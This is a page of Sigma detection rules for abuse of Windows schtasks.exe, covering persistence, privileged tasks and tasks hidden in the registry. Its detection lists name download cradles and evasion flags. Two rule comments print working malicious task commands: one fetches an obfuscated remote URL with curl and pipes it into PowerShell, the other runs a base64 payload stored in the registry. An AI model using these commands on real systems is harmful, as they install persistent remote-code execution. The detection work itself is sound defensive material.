Sigma rules for schtasks
17 rules · scoped to tool · back to schtasks
Direct rules mention this entity in their title or description. Related rules cover the techniques this entity is known to use.
title: Renamed Schtasks Execution
id: f91e51c9-f344-4b32-969b-0b6f6b8537d4
status: experimental
description: |
Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.
One of the very common persistence techniques is schedule malicious tasks using schtasks.exe.
Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.
references:
- https://x.com/JangPr0/status/1932034543026065833
- https://ss64.com/nt/schtasks.html
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-27
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.stealth
- attack.t1036.003
- attack.t1053.005
logsource:
category: process_creation
product: windows
detection:
selection_cmd_operation:
CommandLine|contains|windash:
- ' /create '
- ' /delete '
- ' /query '
- ' /change '
- ' /run '
- ' /end '
selection_cmd_flags:
CommandLine|contains|windash:
- ' /tn '
- ' /tr '
- ' /sc '
- ' /st '
- ' /ru '
- ' /fo '
selection_pe:
OriginalFileName: 'schtasks.exe'
filter_main_cmd:
CommandLine|contains: 'schtasks'
filter_main_img:
Image|endswith: '\schtasks.exe'
condition: (all of selection_cmd_* and not filter_main_cmd) or (selection_pe and not filter_main_img)
falsepositives:
- Unlikely
level: high
title: Execution via stordiag.exe
id: 961e0abb-1b1e-4c84-a453-aafe56ad0d34
status: test
description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
references:
- https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html
- https://twitter.com/eral4m/status/1451112385041911809
author: Austin Songer (@austinsonger)
date: 2021-10-21
modified: 2022-12-25
tags:
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\stordiag.exe'
Image|endswith:
- '\schtasks.exe'
- '\systeminfo.exe'
- '\fltmc.exe'
filter:
ParentImage|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder"
- 'c:\windows\system32\'
- 'c:\windows\syswow64\'
condition: selection and not filter
falsepositives:
- Legitimate usage of stordiag.exe.
level: high
title: Delete All Scheduled Tasks
id: 220457c1-1c9f-4c2e-afe6-9598926222c1
status: test
description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-09
tags:
- attack.impact
- attack.t1489
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\schtasks.exe'
CommandLine|contains|all:
- ' /delete '
- '/tn \*'
- ' /f'
condition: selection
falsepositives:
- Unlikely
level: high
title: Schtasks Creation Or Modification With SYSTEM Privileges
id: 89ca78fd-b37c-4310-b3d3-81a023f83936
status: test
description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
references:
- https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-28
modified: 2025-02-15
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_root:
Image|endswith: '\schtasks.exe'
CommandLine|contains:
- ' /change '
- ' /create '
selection_run:
CommandLine|contains: '/ru '
selection_user:
CommandLine|contains:
- 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
- ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
filter_optional_teamviewer:
# FP from test set in SIGMA
# Cannot use ParentImage on all OSes for 4688 events
# ParentImage|contains|all:
# - '\AppData\Local\Temp\'
# - 'TeamViewer_.exe'
Image|endswith: '\schtasks.exe'
CommandLine|contains|all:
- '/TN TVInstallRestore'
- '\TeamViewer_.exe'
filter_optional_office:
CommandLine|contains|all:
# https://answers.microsoft.com/en-us/msoffice/forum/all/office-15-subscription-heartbeat-task-created-on/43ab5e53-a9fb-47c6-8c14-44889974b9ff
- 'Subscription Heartbeat'
- '\HeartbeatConfig.xml'
- '\Microsoft Shared\OFFICE'
filter_optional_avira:
CommandLine|contains:
- '/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR '
- ':\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe'
- '/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART" /RL HIGHEST'
condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: high
title: Schtasks From Suspicious Folders
id: 8a8379b8-780b-4dbf-b1e9-31c8d112fefb
status: test
description: Detects scheduled task creations that have suspicious action command and folder combinations
references:
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical
author: Florian Roth (Nextron Systems)
date: 2022-04-15
modified: 2022-11-18
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_create:
CommandLine|contains: ' /create '
selection_command:
CommandLine|contains:
- 'powershell'
- 'pwsh'
- 'cmd /c '
- 'cmd /k '
- 'cmd /r '
- 'cmd.exe /c '
- 'cmd.exe /k '
- 'cmd.exe /r '
selection_all_folders:
CommandLine|contains:
- 'C:\ProgramData\'
- '%ProgramData%'
condition: all of selection_*
falsepositives:
- Unknown
level: high
title: Suspicious Schtasks Execution AppData Folder
id: c5c00f49-b3f9-45a6-997e-cfdecc6e1967
status: test
description: 'Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local'
references:
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-03-15
modified: 2022-07-28
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\schtasks.exe'
CommandLine|contains|all:
- '/Create'
- '/RU'
- '/TR'
- 'C:\Users\'
- '\AppData\Local\'
CommandLine|contains:
- 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
- ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
filter:
# FP from test set in SIGMA
ParentImage|contains|all:
- '\AppData\Local\Temp\'
- 'TeamViewer_.exe'
Image|endswith: '\schtasks.exe'
CommandLine|contains: '/TN TVInstallRestore'
condition: selection and not filter
falsepositives:
- Unknown
level: high
title: Suspicious Schtasks Schedule Types
id: 24c8392b-aa3c-46b7-a545-43f71657fe98
related:
- id: 7a02e22e-b885-4404-b38b-1ddc7e65258a
type: similar
status: test
description: Detects scheduled task creations or modification on a suspicious schedule type
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
- http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-09
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_time:
CommandLine|contains:
- ' ONLOGON '
- ' ONSTART '
- ' ONCE '
- ' ONIDLE '
filter_privs:
CommandLine|contains:
- 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
- ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
- 'HIGHEST'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Legitimate processes that run at logon. Filter according to your environment
level: high
title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
id: 2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f
status: experimental
description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.
references:
- https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
- https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection
author: Rory Duncan
date: 2025-07-14
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
- attack.command-and-control
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli_sshd:
CommandLine|contains|all:
- ' /create '
- 'sshd.exe'
- '-f'
selection_cli_ssh:
CommandLine|contains|all:
- ' /create '
- 'ssh.exe'
- '-i'
condition: selection_img and 1 of selection_cli_*
falsepositives:
- Unknown
level: high
title: Suspicious Command Patterns In Scheduled Task Creation
id: f2c64357-b1d2-41b7-849f-34d2682c0fad
status: test
description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
references:
- https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/
- https://twitter.com/RedDrip7/status/1506480588827467785
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
author: Florian Roth (Nextron Systems)
date: 2022-02-23
modified: 2024-03-19
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_schtasks:
Image|endswith: '\schtasks.exe'
CommandLine|contains: '/Create '
selection_pattern_1:
CommandLine|contains:
- '/sc minute '
- '/ru system '
selection_pattern_2:
CommandLine|contains:
- 'cmd /c'
- 'cmd /k'
- 'cmd /r'
- 'cmd.exe /c '
- 'cmd.exe /k '
- 'cmd.exe /r '
selection_uncommon:
CommandLine|contains:
- ' -decode '
- ' -enc '
- ' -w hidden '
- ' bypass '
- ' IEX'
- '.DownloadData'
- '.DownloadFile'
- '.DownloadString'
- '/c start /min ' # https://twitter.com/RedDrip7/status/1506480588827467785
- 'FromBase64String'
- 'mshta http'
- 'mshta.exe http'
selection_anomaly_1:
CommandLine|contains:
- ':\ProgramData\'
- ':\Temp\'
- ':\Tmp\'
- ':\Users\Public\'
- ':\Windows\Temp\'
- '\AppData\'
- '%AppData%'
- '%Temp%'
- '%tmp%'
selection_anomaly_2:
CommandLine|contains:
- 'cscript'
- 'curl'
- 'wscript'
condition: selection_schtasks and ( all of selection_pattern_* or selection_uncommon or all of selection_anomaly_* )
falsepositives:
- Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives
level: high
title: Hide Schedule Task Via Index Value Tamper
id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61
related:
- id: acd74772-5f88-45c7-956b-6a7b36c294d2
type: similar
- id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
type: similar
status: test
description: |
Detects when the "index" value of a scheduled task is modified from the registry
Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
references:
- https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-26
modified: 2023-08-17
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains|all:
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\'
- 'Index'
Details: DWORD (0x00000000)
condition: selection
falsepositives:
- Unlikely
level: high
title: Scheduled Task Creation with Curl and PowerShell Execution Combo
id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
status: experimental
description: |
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
references:
- https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.stealth
- attack.t1053.005
- attack.t1218
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
# Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
selection_img:
Image|endswith: '\schtasks.exe'
CommandLine|contains|windash: ' /create '
selection_curl:
CommandLine|contains|all:
- 'curl '
- 'http'
- '-o'
selection_powershell:
CommandLine|contains: 'powershell'
condition: all of selection_*
falsepositives:
- Legitimate use of schtasks for administrative purposes.
- Automation scripts combining curl and PowerShell in controlled environments.
level: medium
title: Suspicious Schtasks Schedule Type With High Privileges
id: 7a02e22e-b885-4404-b38b-1ddc7e65258a
related:
- id: 24c8392b-aa3c-46b7-a545-43f71657fe98
type: similar
status: test
description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-31
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_time:
CommandLine|contains:
- ' ONLOGON '
- ' ONSTART '
- ' ONCE '
- ' ONIDLE '
selection_privs:
CommandLine|contains:
- 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
- ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
- 'HIGHEST'
condition: all of selection_*
falsepositives:
- Some installers were seen using this method of creation unfortunately. Filter them in your environment
level: medium
title: Potential Persistence Via Microsoft Compatibility Appraiser
id: f548a603-c9f2-4c89-b511-b089f7e94549
related:
- id: 73a883d0-0348-4be4-a8d8-51031c2564f8
type: derived
status: test
description: |
Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
references:
- https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
author: Sreeman
date: 2020-09-29
modified: 2023-02-10
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli:
CommandLine|contains|all:
- 'run '
- '\Application Experience\Microsoft Compatibility Appraiser'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
id: 81325ce1-be01-4250-944f-b4789644556f
related:
- id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline
type: derived
status: test
description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
references:
- https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
- https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04
- https://blog.talosintelligence.com/gophish-powerrat-dcrat/
author: Florian Roth (Nextron Systems)
date: 2022-02-21
modified: 2025-10-07
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_1_create:
Image|endswith: '\schtasks.exe'
CommandLine|contains|windash: ' /create '
selection_1_all_folders:
CommandLine|contains:
- ':\Perflogs'
- ':\Users\All Users\'
- ':\Users\Default\'
- ':\Users\Public'
- ':\Windows\Temp'
- '\AppData\Local\'
- '\AppData\Roaming\'
- '%AppData%'
- '%Public%'
selection_2_parent:
ParentCommandLine|endswith: '\svchost.exe -k netsvcs -p -s Schedule'
selection_2_some_folders:
CommandLine|contains:
- ':\Perflogs'
- ':\Windows\Temp'
- '\Users\Public'
- '%Public%'
filter_optional_other:
- ParentCommandLine|contains: 'unattended.ini'
- CommandLine|contains: 'update_task.xml'
filter_optional_team_viewer:
CommandLine|contains: '/Create /TN TVInstallRestore /TR'
filter_optional_avira_install:
# Comment out this filter if you dont use AVIRA
CommandLine|contains|all:
- '/Create /Xml '
- '\Temp\.CR.'
- '\Avira_Security_Installation.xml'
filter_optional_avira_other:
# Comment out this filter if you dont use AVIRA
CommandLine|contains|all:
- '/Create /F /TN'
- '/Xml '
- '\Temp\'
- 'Avira_'
CommandLine|contains:
- '.tmp\UpdateFallbackTask.xml'
- '.tmp\WatchdogServiceControlManagerTimeout.xml'
- '.tmp\SystrayAutostart.xml'
- '.tmp\MaintenanceTask.xml'
filter_optional_klite_codec:
CommandLine|contains|all:
- '\Temp\'
- '/Create /TN "klcp_update" /XML '
- '\klcp_update_task.xml'
condition: ( all of selection_1_* or all of selection_2_* ) and not 1 of filter_optional_*
falsepositives:
- Benign scheduled tasks creations or executions that happen often during software installations
- Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders
level: medium
title: Scheduled Task Executing Payload from Registry
id: 86588b36-c6d3-465f-9cee-8f9093e07798
related:
- id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78
type: derived
status: test
description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
references:
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-18
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection_img:
# schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli_create:
CommandLine|contains: '/Create'
selection_cli_get:
CommandLine|contains:
- 'Get-ItemProperty'
- ' gp ' # Alias
selection_cli_hive:
CommandLine|contains:
- 'HKCU:'
- 'HKLM:'
- 'registry::'
- 'HKEY_'
filter_main_encoding:
CommandLine|contains:
- 'FromBase64String'
- 'encodedcommand'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Unknown
level: medium
title: Removal Of Index Value to Hide Schedule Task - Registry
id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
related:
- id: acd74772-5f88-45c7-956b-6a7b36c294d2
type: similar
- id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61
type: similar
status: test
description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
references:
- https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-26
modified: 2025-10-25
tags:
- attack.defense-impairment
- attack.t1685
logsource:
product: windows
category: registry_delete
detection:
selection:
TargetObject|contains|all:
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\'
- 'Index'
condition: selection
falsepositives:
- Unknown
level: medium
regression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml
title: Scheduled Task Creation Via Schtasks.EXE
id: 92626ddd-662c-49e3-ac59-f6535f12d189
status: test
description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
author: Florian Roth (Nextron Systems)
date: 2019-01-16
modified: 2025-10-22
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.005
- attack.s0111
- car.2013-08-001
- stp.1u
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\schtasks.exe'
CommandLine|contains: ' /create '
filter_main_system_user:
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
filter_optional_msoffice:
# schtasks.exe /Create /tn "Microsoft\Office\Office Performance Monitor" /XML "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Performance Monitor.xml"
ParentImage:
- 'C:\Program Files\Microsoft Office\root\integration\integrator.exe'
- 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe'
Image:
- 'C:\Windows\System32\schtasks.exe'
- 'C:\Windows\SysWOW64\schtasks.exe'
CommandLine|contains: 'Microsoft\Office\Office Performance Monitor'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Administrative activity
- Software installation
level: low